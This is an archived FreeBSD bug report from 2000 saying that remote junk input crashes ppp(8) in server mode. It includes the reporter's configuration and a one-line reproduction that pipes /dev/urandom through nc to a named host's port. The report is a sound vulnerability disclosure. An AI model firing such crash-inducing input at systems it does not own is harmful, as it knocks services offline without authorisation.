From owner-freebsd-bugs Thu Oct 26 13:50: 8 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A09D837B4C5 for ; Thu, 26 Oct 2000 13:50:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA26661; Thu, 26 Oct 2000 13:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.117.178]) by hub.freebsd.org (Postfix) with SMTP id 5945A37B479 for ; Thu, 26 Oct 2000 13:49:29 -0700 (PDT) Received: (qmail 87325 invoked from network); 26 Oct 2000 20:49:10 -0000 Received: from lagoon.freebsd.lublin.pl (qmailr@212.182.115.11) by yeti.ismedia.pl with SMTP; 26 Oct 2000 20:49:10 -0000 Received: (qmail 3546 invoked from network); 26 Oct 2000 20:49:08 -0000 Received: from riget.scene.pl (qmailr@212.182.115.2) by lagoon.freebsd.lublin.pl with SMTP; 26 Oct 2000 20:49:08 -0000 Received: (qmail 96971 invoked by uid 1001); 26 Oct 2000 20:49:04 -0000 Message-Id: <20001026204904.96970.qmail@riget.scene.pl> Date: 26 Oct 2000 20:49:04 -0000 From: venglin@freebsd.lublin.pl Reply-To: venglin@freebsd.lublin.pl To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/22319: Malicious remote user can cause ppp(8) to segfault Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22319 >Category: bin >Synopsis: Malicious remote user can cause ppp(8) to segfault >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Oct 26 13:50:01 PDT 2000 >Closed-Date: >Last-Modified: >Originator: Przemyslaw Frasunek >Release: FreeBSD 4.1.1-STABLE i386 >Organization: ISMEDIA >Environment: FreeBSD ext-fw.czuby.net 4.1.1-STABLE FreeBSD 4.1.1-STABLE #2: Fri Oct 6 13:04:26 CEST 2000 venglin@riget.scene.pl:/sys/compile/LUBI i386 Ppp(8) with server enabled (set server). Configuration file: default: set device /dev/cuaa1 set speed 115200 set log +warning +error +alert nat enable yes set server +23 password_here nat unregistered_only yes set mtu 500 set urgent tcp set urgent tcp +21 +22 +23 +6667 set urgent udp set urgent udp +53 +514 set sendpipe 1024 set recvpipe 1024 enable deflate24 accept deflate24 leased: set ifaddr 212.182.118.90 212.182.118.89 255.255.255.252 >Description: Look below. >How-To-Repeat: riget:venglin:~> cat /dev/urandom | nc ext-fw.czuby.net 23 >& /dev/null [wait few seconds] ... pid 580 (ppp), uid 0: exited on signal 11 (core dumped) Sorry, I can't provide stack backtrace at this moment, I'm running PPP on a diskless machine. >Fix: Unknown. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message